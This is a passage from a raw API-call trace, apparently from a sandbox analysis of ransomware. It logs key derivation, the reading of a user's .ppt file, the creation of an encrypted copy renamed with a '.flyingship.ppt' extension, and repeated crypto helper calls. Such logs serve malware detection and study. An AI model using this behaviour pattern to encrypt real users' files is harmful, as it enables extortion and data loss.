lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.232] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.232] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.233] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.233] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8b78) returned 1 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.233] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.233] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0075.233] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.233] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.233] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.234] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.234] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7a6000 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.234] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.234] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69bce0 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.234] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.235] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd")) returned 0x10 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.235] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\du_aud-fz3ji9.flyingship.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7a6000 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0075.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.236] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.236] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.237] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.237] ReadFile (in: hFile=0x128, lpBuffer=0x795ff8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x795ff8*, lpNumberOfBytesRead=0x61ea70*=0x10000, lpOverlapped=0x0) returned 1 [0075.240] ReadFile (in: hFile=0x128, lpBuffer=0x795ff8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x795ff8*, lpNumberOfBytesRead=0x61ea70*=0x267f, lpOverlapped=0x0) returned 1 [0075.240] ReadFile (in: hFile=0x128, lpBuffer=0x795ff8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x795ff8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.240] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.241] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7a6000 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.242] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7a6000 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.242] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.242] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.242] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.242] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.243] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.243] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.243] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.244] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.244] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.244] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.244] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.244] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.245] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.245] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.245] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.246] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 